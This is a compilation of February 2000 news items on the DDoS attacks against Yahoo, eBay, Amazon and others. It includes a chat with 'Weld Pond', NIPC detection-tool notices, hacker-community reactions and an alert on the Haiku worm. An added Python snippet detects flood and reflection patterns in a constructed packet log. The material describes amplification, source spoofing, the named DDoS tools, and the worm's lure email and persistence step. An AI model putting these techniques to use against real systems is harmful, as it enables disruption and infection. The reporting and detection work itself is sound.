Call it cybervandalism, or even cyberterrorism. In the last 48 hours, it's been rampant. Using an apparently simple plan of attack known as "denial of service," an unknown hacker (or hackers) has humbled the Internet's biggest sites by bombarding them with packets of data. Simply put, the denial-of-service attacks bring Web sites to their knees for hours, because their lines are all tied up. In the good news category, the victims' infrastructures are not at all compromised; no credit card numbers are stolen nor is anything lost or damaged.

As of midday Wednesday, the list of apparent targets spans from Amazon.com (AMZN) to ZDNet (ZDZ) — with Buy.com (BUYX), Time Warner's (TWX) CNN.com, privately held Datek Online, eBay (EBAY), E*Trade Group (EGRP), TD Waterhouse (TWE) and Yahoo! (YHOO) reporting apparently related problems. Most of these sites have experienced slowdowns and outages for a few hours in some U.S. locations.

So far, the financial impact of the outages has been called negligible by analysts, but the fear is that it could happen again (and again). That could be why the Nasdaq rally finally pooped out Wednesday, after the composite index hit new highs on both Monday and Tuesday. Amazon.com shares fell $10.72, or 2.9%; eBay shed $5.75, or 3.4%; E*Trade sunk $1.13, or 4.3%, and Yahoo was down $10.75, or 2.9%. But unlike those Internet blue chips, Buy.com stock climbed $2.38, or 9.5%, to $27.50. Buy.com shares have been trading for only two days, and the site has experienced apparent hacking troubles on both days.

While many consumers are hearing about the problem for the first time this week, the tech community has been aware of the threat for years.
The FBI's National Infrastructure Protection Center has issued many alerts on the latest "DoS" threats. Most recently, on New Year's Eve, the FBI warned that it had seen "multiple reports of intruders installing distributed denial-of-service tools on various computer systems to create large networks of hosts capable of launching significant coordinated packet flooding denial-of-service attacks." (Got that?)

This afternoon, Attorney General Janet Reno announced a criminal investigation into the matter, vowing that federal law-enforcement officials would do everything in their power to combat cyberterrorism. And at a press conference this afternoon, the FBI's Ronald Dick suggested the attacks could be related to the recent proliferation of two hacking programs called Tribe Flood Network (TFN) and TRINOO. Meanwhile, the hacking site 2600 reports that the assaults may have been launched with another troublesome "tool" called Smurf.

Mischievous hackers can download such programs from various sites on the Web. Then, using fairly basic hacking techniques, they install the program on several hundred low-security servers and then set them to go off at a certain time. (These hosts may be computers at schools and universities, which often have fairly lax security.) The hackers can then launch a coordinated flood of hundreds of packets of data to a targeted Web site.

Imagine the data packet says "hi" to each of the Web site's servers. Each server then acknowledges the packet by responding with something like "yes, I'm here." Those responses then trigger more packets of information, and the attack is amplified (hundreds multiplied by hundreds of packets). And that's how the resulting data traffic jam clogs up the servers. It's a high-tech equivalent of tying up an 800 number by getting all your friends (and all their friends) to call in at once. Nobody else can get through.
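What the two patterns described above (a coordinated flood from hundreds of prepared hosts, and the "hi" / "yes, I'm here" amplification through reflecting hosts) look like from the defender's side, as an added example that is not part of the Smart Money article and is not code from TFN, trinoo, Smurf or the NIPC tool. It runs two detectors over a constructed packet log: one flags a destination receiving a high packet rate from many distinct claimed sources, the other flags echo requests to one destination that all claim the same source, which at the reflecting network is the forged-source signature. The `Packet` record, the `make_sample` log, the thresholds and all addresses (documentation and private ranges) are constructed for the example.

```python
# Added example (not from the Smart Money article, nor from TFN, trinoo or
# Smurf): two detectors run over a constructed packet log, showing what the
# flood and amplification patterns described above look like to a defender.
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    t: float    # seconds since capture start
    src: str    # claimed source address; in a flood it may be forged
    dst: str
    proto: str  # "tcp", "udp" or "icmp-echo-req"
    size: int   # bytes


def make_sample():
    """Constructed packet log. Addresses come from documentation/test ranges
    (RFC 5737 and RFC 1918); none of this is captured traffic."""
    pkts = []
    # 1. Ordinary traffic: five clients, about three packets a second to the web server.
    for i in range(30):
        pkts.append(Packet(i / 3.0, f"198.51.100.{1 + i % 5}", "10.0.0.80", "tcp", 600))
    # 2. Coordinated flood: 150 prepared hosts each send one packet per second
    #    for two seconds, the "hundreds of servers" pattern the article describes.
    for t in (10, 11):
        for i in range(1, 151):
            pkts.append(Packet(t + i / 1000.0, f"203.0.113.{i}", "10.0.0.80", "udp", 1400))
    # 3. Amplification: echo requests to a network's broadcast address, every one
    #    claiming the web server as its source, so the replies all land on it.
    for i in range(40):
        pkts.append(Packet(20 + i / 20.0, "10.0.0.80", "192.0.2.255", "icmp-echo-req", 64))
    # 4. A few legitimate pings to the server, which must not be flagged.
    for i in range(3):
        pkts.append(Packet(30.0 + i, "198.51.100.1", "10.0.0.80", "icmp-echo-req", 64))
    return pkts


def distributed_flood(pkts, window=1.0, min_packets=100, min_sources=50):
    """Return (dst, window_start, packets, distinct_sources) for every window
    in which one destination receives a high packet rate from many distinct
    claimed sources. Dispersion is the point: one busy client is not a flood,
    and a flood from hundreds of sources is not stopped by blocking any one."""
    buckets = defaultdict(list)
    for p in pkts:
        buckets[(p.dst, int(p.t // window))].append(p.src)
    alerts = []
    for (dst, w), srcs in sorted(buckets.items()):
        if len(srcs) >= min_packets and len(set(srcs)) >= min_sources:
            alerts.append((dst, w * window, len(srcs), len(set(srcs))))
    return alerts


def reflection_pattern(pkts, min_requests=20, dominance=0.9):
    """Return (claimed_src, dst, count) where echo requests to one destination
    come overwhelmingly from a single claimed source. Seen at the reflecting
    network this is the forged-source signature: the replies will flood the
    claimed source, not the sender. The fix there is to drop echo requests to
    broadcast addresses at the border instead of answering them."""
    per_dst = defaultdict(Counter)
    for p in pkts:
        if p.proto == "icmp-echo-req":
            per_dst[p.dst][p.src] += 1
    alerts = []
    for dst, srcs in per_dst.items():
        total = sum(srcs.values())
        src, n = srcs.most_common(1)[0]
        if n >= min_requests and n / total >= dominance:
            alerts.append((src, dst, n))
    return sorted(alerts)


def largest_single_source_share(pkts, dst):
    """Fraction of traffic to dst carried by its busiest claimed source. For
    the flood above this is tiny (the busiest address is actually a legitimate
    client), which is why blocking sources one at a time does not help."""
    counts = Counter(p.src for p in pkts if p.dst == dst)
    return counts.most_common(1)[0][1] / sum(counts.values())


if __name__ == "__main__":
    log = make_sample()
    for alert in distributed_flood(log):
        print("flood:", alert)
    for alert in reflection_pattern(log):
        print("reflection:", alert)
    print("busiest source share:", round(largest_single_source_share(log, "10.0.0.80"), 3))
```

The two detectors sit at different vantage points: `distributed_flood` is what the targeted site or its upstream sees, while `reflection_pattern` is what the networks being used as amplifiers would see, and only the latter can stop the amplification at its source.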
"The problem is that it's next to impossible to prevent," says Robert Kolstad, an editor of security news for SANS (System Administration, Networking, and Security) Institute, a cooperative research organization. Once the problem is detected, Kolstad notes, the Web site's administrators can try to repel some of the packets with filters, as Yahoo did on Monday. The filters reject data packets coming from any suspicious locations. With some quick work, an attack can be thwarted with minimal down time. But clever hackers can make filtering cumbersome if their packets seem to originate from, say, thousands of locations that keep shifting. So far, though, eBay, E*Trade and the rest have been up and running again within a couple of hours. Such attacks don't require heavy computing power. According to Weld Pond, a research scientist at Boston-based security consultancy @Stake (who uses a hacking handle instead of his real name), all that's necessary is a fast connection with which to set off the flood. "It could be a five-year-old computer, but if it's sitting on a network at a university or corporation, it probably has a really good connection to the Internet," he says. Nor do these denial-of-service attacks display much skill or originality. The programs are easily downloadable from various hacking sites on the Web. And while it's time-consuming to hack into and prepare the hundreds of servers required to overwhelm a Web site, Weld Pond says it's not particularly difficult. "It's the kind of thing that, if you were at average proficiency with Internet software, you could probably learn in a few hours," he says. "It probably took a few months to set up, to gather the amount of machines to attack. Whoever's doing this is industrious." Because of the anonymity and ease of the attacks, it's very difficult to track down who launched them. 
The assault may seem to come from servers in New York or Mountain View, Calif., but the hacker may be a loner in a basement in Crested Butte, Colo. "The speculation is that they're going to brag about it," Kolstad says. And that, he thinks, is the best hope for tracking down the perpetrators.

The attacks also seem to show a vicious sense of humor. The first assault, on Yahoo, came a few short minutes after AT&T Labs security expert Steven Bellovin gave a speech on denial-of-service attacks at the just-completed North American Network Operators' Group (NANOG) meeting in San Jose, Calif., which suggests that the attacks were timed by "someone trying to prove a point," Weld Pond says.

Whatever point that was, computer experts express disdain for whoever is behind the attacks. Mark Gebert, senior systems research programmer at Merit Network, the nonprofit regional network that sponsors the NANOG meetings, bristles at the labeling of the attackers as "hackers." According to Gebert, they are known in the computer community as "crackers" and "script kiddies" because of their dependence on preprogrammed tools. Their assaults on Web sites may not be particularly elegant or inventive — but that doesn't make them any less illegal.

-=-

Smells Like Mean Spirit
by Leander Kahney
10:50 a.m. 9.Feb.2000 PST

Hackers, who pride themselves on Web attacks with a purpose, are scornful of the "packet monkeys" responsible for this week's attacks on Yahoo, CNN, and other high-profile sites.

The cracker or crackers responsible for the attacks have been contemptuously dubbed "packet monkeys" because their exploits involve flooding a site with packets of information and, detractors say, betray a distinctly simian intelligence.

Like "script kiddies" who use well-documented techniques and readily available software to deface Web sites, packet monkeys are dismissed as adolescent vandals by a community that celebrates know-how, originality, and creativity.
"There's no technical prowess whatsoever in these kind of attacks," said "Space Rogue," a research scientist with @Stake (formerly the highly respected L0pht Heavy Industries) and editor of the Hacker News Network. "This isn't anything new. This is old, tired technology someone is running in a big way." "This kind of thing is really frowned on," said YTCracker, a 17-year-old high school student from Colorado, who recently claimed responsibility for cracking a number of U.S. government sites. "It's a bunch of bored kids trying to show they have the guts to do this.... We don't like to be associated with these people." No one has come forward to claim responsibility for the attacks. Unlike a vandalized Web site, where the cracker usually leaves a moniker, says hi to his friends, or taunts law enforcement, a packet monkey attack leaves no public traces and no clue to the cracker's identity. Space Rogue said crackers typically advertise their exploits to gain acceptance with their peer group. In fact, this is frequently the motive for the attack. "It makes you wonder what kind of person is pulling this off and why they're doing this," he said. "There's no public record, no boasting, nothing left behind." Space Rogue said there is also very little gossip about the identity and motive of the attackers. "Rumors are scarce on this one," he said. "That's unusual.... My gut feeling tells me it's an individual and not a group, but I don't have any evidence to back that up." Although most hackers condemn the attacks, at least one poster to Slashdot professed his "grudging admiration" for what appears to be a concerted demonstration against the commercialization of the Internet. "This is the equivalent of a blockade -- a formal, organized protest," wrote "Swordgeek." "Not throwing rocks through windows so much as linking arms in front of a police line. 
"The brats and miscreants may have gotten their shit together and started to fight for something worthwhile, rather than simply for the hell of it." -=- ABC A Tangled Web: A Chat with Former Hacker “Weld Pond” Feb. 9 —ZDNet became one of the latest victims of a cyber attack when the site was taken offline for at least two hours today. A ZDNet spokeswoman told ABCNEWS.com the company believes the strike most likely came from the same group of attackers responsible for knocking at least four other major Web sites offline, including Amazon.com and eBay.com, in the past two days. Why are these major sites under attack? Who is responsible for these acts, and can the culprits be caught? How secure is the Internet? Former hacker “Weld Pond” answered questions from ABCNEWS.com readers today in an online chat. Weld has testified before the Senate on the state of Internet security and is currently a research scientist at security services provider @Stake. Below is a transcript of the chat. Moderator at 2:58pm ET Welcome to our live chat with former hacker "Weld Pond." Thanks for being here today. Weld Pond at 2:59pm ET Hi, glad to be here. Moderator at 2:59pm ET Any idea who's responsible for these recent cyber attacks? Weld Pond at 3:00pm ET It could be anybody from a 15-year old kid to a foreign government. But I think it is more likely the former. Kingpin from 230.73.33.cypresscom.net at 3:01pm ET Why do you think it takes a major event such as this to occur before people begin to think about security? Shouldn't security be designed into the system from the start, not added AFTER something happens? Weld Pond at 3:01pm ET Because it takes time and money to design security from the start. People are optimists and don't think the worst will happen. KBear at 3:02pm ET Should companies be worried that hackers might have contacts inside their firms? People with grudges? Weld Pond at 3:03pm ET People should be worried about insiders at a company more than outsiders. 
This is how most security breaches occur. They just are not reported that often.

Moderator at 3:03pm ET
Tipo asks: How does someone become a hacker? Is there some sort of initiation?

Weld Pond at 3:04pm ET
There is no initiation to become a hacker. Most are self-taught and are reasonably proficient before they seek out other hackers to exchange information with.

M T Bethel from viagrafix.com at 3:04pm ET
What would be the benefit to anyone (or group) who would coordinate such an attack?

Weld Pond at 3:05pm ET
I think these big name attacks are mostly for bragging rights. To impress your peers.

Moderator at 3:05pm ET
Matthew asks: Is this a lesson in how fragile the Internet is, or a new form of terrorism?

Weld Pond at 3:07pm ET
Well I think it is both. The Internet was not designed to be robust to denial of service attacks. It just wasn't thought about at the time. This is a new form of terrorism. People follow the technology to where the important and powerful are and try to disrupt and scare them.

RBeesto from co.polk.ia.us at 3:07pm ET
Do you think this is the start of some kind of cyber siege, to be duplicated by numerous copycats?

Weld Pond at 3:07pm ET
I think it will be copied. With all the media attention this is getting it is the perfect way for someone to gain attention.

Goodguy at 3:08pm ET
Do you have the knowledge or ability to do something like this?

Weld Pond at 3:09pm ET
Yes. Anyone who follows the computer security forums on the Internet knows how to do this. The tools and instructions are available widely. This is just the first time someone has tried it on very big Web sites.

Howard at 3:09pm ET
How is a "denial of service" attack harder to secure against than an electronic break-in? What steps would YOU take if you were Yahoo, or eBay?

Weld Pond at 3:10pm ET
It is much harder because the attacker is taking advantage of what the network was designed to do — deliver a lot of packets (or data) efficiently.
It is hard to tell just busy network traffic from the attack traffic. To stop it you need to understand the exact attack and try to filter it out on the routers that connect the Web sites to the Internet.

Martel from cc.ncsu.edu at 3:11pm ET
Do you think these high-profile attacks may be a distraction from smaller, intrusive attacks against other sites?

Weld Pond at 3:11pm ET
Quite possibly. These attacks could be just a diversionary tactic. That is a standard technique to get around security mechanisms.

Crackerjack at 3:12pm ET
How hard will it be for the FBI to track down the parties responsible?

Weld Pond at 3:13pm ET
It is very difficult to track down the attacker in a denial of service attack. The data sent in the attack does not have to have valid return addresses so the packets need to be traced back one router hop at a time.

Moderator at 3:14pm ET
PJ asks: What's the likelihood of these crackers being caught? Do you think they're afraid of being caught?

Weld Pond at 3:15pm ET
The attackers have probably taken steps to anonymize themselves. It will be difficult to track them down. The longer they keep doing it the more time they give to be traced back however.

Moderator at 3:15pm ET
RayHS1 asks: What actual crimes or offenses have been committed with these attacks?

Weld Pond at 3:16pm ET
It is a federal crime to disrupt someone's computer service. The same law that was used to prosecute the writer of the Melissa virus would be used in this case.

null from enoch.org at 3:17pm ET
Weld, l0pht has said in the past that one of the best ways to carry across the message that the term 'hacker' does not necessarily equate 'criminal' to the general public is for non-criminal hackers to identify themselves as such. Does it bother you, then, to be featured on ABCNews.com billed as a "former hacker"?

Weld Pond at 3:18pm ET
I would rather still be called a hacker than former hacker. I'm wearing an @Stake tshirt right now and it has "Hacker" emblazoned on the back.
:-)

John in Dallas from cadence.com at 3:18pm ET
What about the small companies — how do small companies protect against this type of stuff without the capital to purchase all this protection?

Weld Pond at 3:19pm ET
Small companies need to demand better security from their vendors, whether they are their ISPs, hardware, or software providers.

aj from rpr.rpna.com at 3:19pm ET
If the hackers do not have a valid address or IP address, how do they access the Net and wouldn't that flag an ISP somewhere?

Weld Pond at 3:20pm ET
They are connected with a valid IP address but they can still send other data that has invalid IP addresses unless their ISP is filtering/detecting that. Most ISPs do not do this. That is a problem that needs to be fixed.

BVRWINS from city.palo-alto.ca.us at 3:21pm ET
Can attacks like these be carried out by a single computer? Or are these coming from an organized group?

Weld Pond at 3:21pm ET
There are probably a few computers that are controlling 100s or 1000s of machines in tandem. That is the only way a huge site like Yahoo could be taken down with denial of service.

John from cm-media.com at 3:22pm ET
Hackers often claim they're performing a service by liberating information and testing security systems. Do you see any such "positive" effects in these cases, or is it simple harassment?

Weld Pond at 3:23pm ET
Sometimes it takes an actual demonstration of the problem before anyone does anything. I don't advocate denial of service attacks but I can see how they are a wake-up call to people who have been ignoring the problem.

aNoViCe at 3:24pm ET
Are there legitimate reasons for data not to have valid return addresses? If not, wouldn't it solve the problem to have servers not accept packets without valid return addresses?

Weld Pond at 3:26pm ET
There is no legitimate use for them. All routers should have ingress filters to make sure that the IP addresses they are accepting are valid.
It is not feasible to check for validity on the Internet backbone routers or at the Web site's router. This test must be done at each ISP that connects an organization or person to the Internet. This needs to be done to start to combat this problem.

Dan in Philly at 3:27pm ET
Do you believe the glorification that comes with such media exposure will fuel others to attempt similar attacks, and if so what can the media do with companies to responsibly report such problems?

Weld Pond at 3:28pm ET
I think it will definitely fuel more copycats. I think having other hackers speaking out that denial of service attacks are stupid and that they do not show any technical prowess may help. The people who launch these attacks are just vandals and they should be described that way.

jbomma from ford.com at 3:28pm ET
Isn't this really an example of the adage: "Criminals are always one step ahead". Once this problem is solved, hackers will continue to invent new types of attacks, will they not?

Weld Pond at 3:13pm ET
These types of attacks were well known for at least a year. It is just that no one has taken the time to try and come up with a solution until now. It seems like the attackers are a step ahead but it is only because the public only finds out about the problems after the attackers strike.

Moderator at 3:23pm ET
Suppression asks: Are you concerned that the officials may go too far in their attempt to find these individuals? Is there a real possibility of a permanent invasion of privacy as to the activity of law-abiding Web users?

Weld Pond at 3:33pm ET
It scares me that the government may take a monitoring and surveillance approach to solving these problems. I don't think this is a good solution plus it invades the privacy of law-abiding Internet users. The solution is to design secure networks and to secure the computers that are being compromised to launch the distributed attacks from.

Moderator at 3:33pm ET
Thanks for your time today, Weld.
Any final words for our audience?

Weld Pond at 3:34pm ET
It was great to be here to answer these questions. I think that eventually there will be a solution to these denial of service problems. But I think it will take some time to design and put in place. Until then I expect to see more attacks like this.

Moderator at 3:35pm ET
Stay with ABCNEWS.com for continuing coverage of this story.

-=-

CNN: Classic Hackers Decry Heavy-Handed Upstarts

February 9, 2000
Web posted at: 4:14 PM EST (2114 GMT)
By Jessica Reaves

In the world of Internet hacking, as in the world of rap music, there is the old school, and then there are the insurgents. The former tends to view the latter with some suspicion, and perhaps a bit of jealousy. Such was the case Wednesday; establishment hackers are up in arms over the media attention paid to Monday and Tuesday's attacks on Yahoo, eBay, CNN and Buy.com.

"We find that there are already ample words in the English language to describe such miscreants and call upon the media to define them by their actions, as they are all we know them by at this point," fumed the editors of 2600, The Hacker Quarterly.

Fiercely protective of their reputation, longtime hackers are locked in a love-hate relationship with web site designers, who grudgingly appreciate hackers' talent for pinpointing serious security lapses. "Hacking is generally accepted to be the arena of very smart people," says Stuart McClure, president of Rampart Security Group in Irvine. "Denial of service attacks, like what happened to Yahoo and eBay, are seen as bottom-of-the-barrel assaults; they don't require a lot of brains."

When a site has been hacked, its appearance is often altered by chest-beating hackers who leave the cyber equivalent of a "Kilroy was here" scrawl. This week's attacks, on the other hand, bombarded various high-traffic sites with an overflow of information, effectively shutting down normal operations.
How do the perpetrators send so much data so quickly? Apparently, the most recent assaults are not typical denial of service pranks, which generally are sent from only one or two computers at a time. "These people scan the Internet for vulnerable systems, and they hack into those systems, and then use hundreds of those computers, remotely, to send the attack," says McClure.

The latest string of invasions may inspire some instances of increased security, says McClure, but consumers shouldn't expect a sudden influx of super-secure sites. "There are ways to keep these attacks from happening, but few companies implement them. Security tends to take a backseat to aesthetics and ease of service at the site," McClure says.

And while Net businesses may be tempted to pump their time and money into the more visible aspects of a site, the current threat to their bottom line may force them to rethink their priorities. After all, seeing a multibillion-dollar web site brought to its knees by a group of not-so-bright pranksters doesn't inspire a whole lot of confidence on Wall Street -- or among consumers and advertisers.

Copyright © 2000 Time Inc.

@HWA

125.0 HNN: Feb 10th; NIPC Releases Detection Tools
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by jericho

NIPC has developed a new release of the software application that will detect tfn2k client, tfn2k daemon, trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stacheldraht daemon and tfn-rush client. This new version (find_ddosv31) is now available for Solaris on Sparc or Intel platforms and Linux on Intel platforms and will no longer improperly identify itself or any previous version as a DDOS program.

NIPC
http://www.fbi.gov/nipc/trinoo.htm

Unfortunately they are only distributing executables and not source.
With all the recent cases of the FBI and NSA trying to pass legislation that will allow them to backdoor various communications systems, computer networks and everything else.. how could anyone trust these?

FBI: UPDATED Version 3.1 Released

NATIONAL INFRASTRUCTURE PROTECTION CENTER; TRINOO/Tribal Flood Net/tfn2k

During the past few weeks the NIPC has seen multiple reports of intruders installing distributed denial of service tools on various computer systems, to create large networks of hosts capable of launching significant coordinated packet flooding denial of service attacks. Installation has been accomplished primarily through compromises exploiting known sun rpc vulnerabilities. These multiple denial of service tools include TRINOO, and Tribe Flood Network (or TFN & tfn2k), and have been reported on many systems.

The NIPC is highly concerned about the scale and significance of these reports, for the following reasons:

Many of the victims have high bandwidth Internet connections, representing a possibly significant threat to Internet traffic.

The technical vulnerabilities used to install these denial of service tools are widespread, well-known and readily accessible on most networked systems throughout the Internet.

The tools appear to be undergoing active development, testing and deployment on the Internet.

The activity often stops once system owners start filtering for TRINOO/TFN and related activity.

Possible motives for this malicious activity include exploit demonstration, exploration and reconnaissance, or preparation for widespread denial of service attacks.

NIPC requests that all computer network owners and organizations rapidly examine their systems for evidence of these distributed denial of service (DDOS) tools (specific technical instructions are available from CERT-CC, SANS, NIPC, or other sources). The NIPC is making available on its web site a software application that can be used to detect the presence of these DDOS tools.
Recipients are asked to report significant or suspected criminal activity to their local FBI office or the NIPC Watch/Warning Unit, and to computer emergency response support and other law enforcement agencies, as appropriate. The NIPC Watch and Warning Unit can be reached at (202) 323-3204/3205/3206, or nipc.watch@fbi.gov.

This latest update reflects that NIPC has developed a new release of the software application that will detect tfn2k client, tfn2k daemon, trinoo daemon, trinoo master, tfn daemon, tfn client, stacheldraht master, stacheldraht client, stacheldraht daemon and tfn-rush client. This new version (find_ddosv31) is now available for Solaris on Sparc or Intel platforms and Linux on Intel platforms and will no longer improperly identify itself or any previous version as a DDOS program.

This executable (find_ddosv31_{platform}.tar.Z) is for Solaris 2.5.1, 2.6, and Solaris 7 on the {Sparc} or {Intel} platforms, and {Linux} on Intel platforms. This file will not work on a Windows-based PC.

(Follow link for executables - Ed)

-=-

Press Release: For Immediate Release
December 30, 1999
Washington D.C.
FBI National Press Office

The FBI today issued the following statement:

Over the last several weeks, the National Infrastructure Protection Center (NIPC) has received multiple reports of the presence of Distributed Denial of Service (DDOS) tools on computer systems in the United States. The NIPC issued alerts about these tools on December 6, 1999 and today (see http://www.nipc.gov). The CERT at Carnegie Mellon has also issued an incident note (IN-99-07) on November 18, 1999, and an update on December 28, 1999 (see http://www.cert.org/incident_notes/IN-99-07.html). These DDOS tools have also now been reported by the media and published on the Internet.

These DDOS tools, such as "trin00" and "Tribe Flood Network" ("tfn"), are capable of generating sufficient network traffic to render the targeted network or computer system inoperable.
Installation has been accomplished primarily through compromises exploiting known Sun RPC vulnerabilities. Basically, these tools allow an intruder to have multiple victim systems launch denial of service attacks against other systems that are the ultimate target.

The NIPC has developed a software application that can be used by system administrators to scan their computer systems to determine whether they contain the "trin00" or "tfn" tools and therefore might be used as part of a DDOS attack on another network. The latest version of this detection software can be downloaded from the NIPC Internet Web site (http://www.nipc.gov). The NIPC requests that computer network administrators report the detection of DDOS tools or other apparent criminal activity on their systems to their local FBI Field Office or to the NIPC at nipc.watch@fbi.gov.

NIPC Director Michael Vatis stated: "A central part of the NIPC's mission is to help protect critical computer networks by alerting private industry and government agencies of potential threats before an attack occurs. In this case, we have gone one step further by developing a software application that can be used to detect the presence of a significant hacker tool and neutralize it."

The NIPC commenced its Y2K Command Post at FBIHQ yesterday, and will operate 24 hours a day until January 5. In addition, each FBI Field Office has initiated a Command Post. These Command Posts have been established to facilitate the FBI's detection of and response to any criminal activity, cyber or physical, that might occur during the Millennium rollover period.

The NIPC is a multi-agency organization whose mission is to detect, warn of, respond to, and investigate computer intrusions and other unlawful acts that threaten or target our Nation's critical infrastructures. Located in the FBI's headquarters building in Washington, D.C., the NIPC brings together representatives from the FBI, other U.S.
government agencies, state and local governments, and the private sector in a partnership to protect our Nation's critical infrastructures. More information on the NIPC is available on the World Wide Web at http://www.nipc.gov.

The following MD5 checksums should be used to validate the files available for downloading:

MD5 (README-find_ddos) = 4f6269ebb6b695162ccd919c4df9385d
MD5 (find_ddos.tar.Z) = 4522f64b491664f93eca27283d2f77ba

@HWA

126.0 HNN: Feb 10th; The Underground Reaction
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki and Bronc

2600.com has an interesting viewpoint on this whole mess and the media representations of hackers.

2600.com
http://www.2600.com/news/2000/0209.html

Bronc Buster has posted an article with more opinions from the underground about these recent attacks.

The Synthesis
http://www.thesynthesis.com/tech/takedown/index.html

2600: HACKERS TO BLAME? DOUBTFUL
02/09/00

We feel sorry for the major Internet commerce sites that have been inconvenienced by the Denial of Service attacks. Really, we do. But we cannot permit them or anyone else to lay the blame on hackers. So far, the corporate media has done a very bad job covering this story, blaming hackers and in the next sentence admitting they have no idea who's behind it. Since the ability to run a program (which is all this is) does not require any hacking skills, claiming that hackers are behind it indicates some sort of knowledge of the motives and people involved. This could be the work of someone who lost their life savings to electronic commerce. Or maybe it's the work of communists. It could even be corporate America itself! After all, who would be better served by a further denigration of the hacker image with more restrictions on individual liberties?

Let's look at the headlines: "Government sees cyber-attacks as disruption of commerce." "Justice Department wants more funds to fight cyber crime." Didn't take them long, did it?
And later in the same story: "But the FBI may never know who is responsible for the cyber-attacks, due to the difficulty in tracing the electronic trails, a senior law enforcement source told CNN." How convenient. An unseen villain. No need for any actual FACTS to be revealed, but plenty of blame to be cast on hackers everywhere. We find it to be a bit too contrived. Whoever is responsible is either completely clueless or knows EXACTLY what they're doing. It's the latter that should concern hackers everywhere.

Number of times hackers were named or implied as culprits on these sites:

cnn.com      14
msnbc.com    13
zdnet.com     4
abcnews.com   0

-=-

Bronc;

So it comes to pass, the biggest names of the Internet are taken down in some of the most massive denial of service attacks ever launched against these major portals and web sites. Yahoo, one of the top three most visited sites on the Internet, was reported to have been down for three hours on Sunday. Buy.Com had been taken down for several hours as well early Monday, with CNN and eBay unreachable during the afternoon, and then Amazon.Com and Zdnet.Com unreachable for hours late Monday night—reportedly all the targets of the latest round of attacks on Monday.

The main questions that beg to be answered are who is doing this, and why. Several stories have been done in the last day, based mostly on rumors that have been floating around and "expert" opinions as to what was happening and why, but there aren't many hard facts among them.

Several stories have reported the problem as a huge Denial of Service attack, where crackers launch a large amount of false requests at a server, basically clogging it up so other users can not reach it. A few stories have reported that the Yahoo problem was just that, an internal problem with the company that provides Yahoo with their connection to the Internet, and not an attack. Still others have reported both poorly configured equipment and a combination of attacks.
It is clear now, with the attacks against CNN, Buy.Com, eBay, Amazon and Zdnet today, that there is someone, or some group, out there with an agenda, attacking these sites on purpose. The reasoning behind it may remain unknown for now, but many in the hacker community are speculating what kind of attacks are being used to cause this type of massive denial of service, and what the motives might be behind it.

A hacker with Condemned.Org, who goes by the name b|ueberry, said she thought the attacks were done using a program called "Trinoo," which allows one person to set up several systems (thousands possibly) across the Internet and use them in a coordinated attack. This type of program allows the attackers to easily utilize a large network of boxes they have control of across the Internet, and use them to strike at once against their desired targets. As to why these attacks were taking place, she speculated that they "were a bunch of idiots with nothing better to do…"

Her harsh words were echoed across the net. "The people who did this are most likely bored 15 year olds with nothing better to do than be a menace," said Eli Bottrell, system administrator for SysAdmins.Com. Others that were questioned about their views on these attacks followed suit, saying that the assaults were most likely being perpetrated by youngsters either out to impress friends or make a name for themselves.

One unnamed expert was quoted on the Today Show this morning claiming he had gotten an e-mail from the attackers. This e-mail, he said, claimed that the attackers were mad at the commercialization of the Internet and at the specifically targeted sites, and also went on to state that the attacks would continue against other large sites.

Reports coming out of San Francisco say that the FBI there has opened an investigation into this matter, and is also looking into some of the affected companies.
One story had unconfirmed reports of the attacks being traced back to a central computer where a list of possibly up to ten thousand compromised systems was found.

Although large-scale Denial of Service attacks are nothing new to the Internet, not many have been seen on such a large scale against so many targets, as is the case here. Administrators and security experts are sometimes baffled when it comes to stopping these attacks because of the sheer size of the assault, and the multiple locations of origin around the Web. In either case, most people questioned shared the view that the attackers would be caught sooner or later.

Bronc Buster is a California-based hacker and can be reached at bronc@thesynthesis.com

@HWA

127.0 HNN: Feb 10th; Haiku Worm Now on the Loose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Arik

A worm known as Win32 Haiku.16384, or Haiku Worm for short, has been identified as a potential threat to Internet sites. Once a machine is infected, the worm searches the victim's hard drive for email addresses and then mails itself out to every address it finds.

PR Newswire - via Yahoo
http://biz.yahoo.com/prnews/000209/ny_ca_warn_1.html

Wednesday February 9, 8:27 am Eastern Time

Company Press Release

SOURCE: Computer Associates International, Inc.

Computer Associates Warns of New 'Haiku' Worm

Media Alert for Wednesday, February 9, 2000

ISLANDIA, N.Y., Feb. 9 /PRNewswire/ -- Computer Associates International, Inc. (CA) today warned computer users of the ``Win32 Haiku.16384'' Worm, which has the potential to overload network traffic, impacting the availability of resources. The increase in network traffic may degrade eBusiness performance, making end users unable to connect to email and eCommerce sites. CA has the detection and the fix for this Worm, which was reported by a client.

The Haiku Worm arrives in an email with the subject line ``Fw: Compose your own haikus!'' The email will have the file Haiku.exe attached.
The text of the message reads:

:)) "Old pond... a frog leaps in water's sound." -Matsuo Basho.

DO YOU WANT TO COMPOSE YOUR OWN HAIKUS?

Haiku is a small poetry with oriental metric that appeared in the XVI century and is being very popular, mainly in Japan and the USA. It's done to transcend the limitation imposed by the usual language and the linear/scientific thinking that treat the nature and the human being as a machine. It usually has 3 lines and 17 syllables distributed in 5, 7 and 5. It must register or indicate a moment, sensation, impression or drama of a specific fact of nature. It's almost like a photo of some specific moment of nature. More than inspiration, what you need in order to compose a real haiku is meditation, effort and perception.

DO YOU WANT TO COMPOSE YOUR OWN HAIKUS? Now you can! it is very easy to get started in this old poetry art. Attached to this e-mail you will find a copy of a simple haiku generator. It will help you in order to understand the basics of the metric, rhyme and subjects which should be used when composing a real haiku... just check it out! it's freeware and you can use and spread it as long as you want!

If Haiku.exe is run, it copies itself to C:\WINDOWS\HAIKUG.EXE and edits the WIN.INI file, so the Worm will be loaded when Windows is restarted. The Worm then displays a poem that is generated from an internal list of words. The program exits when the 'OK' button is selected.

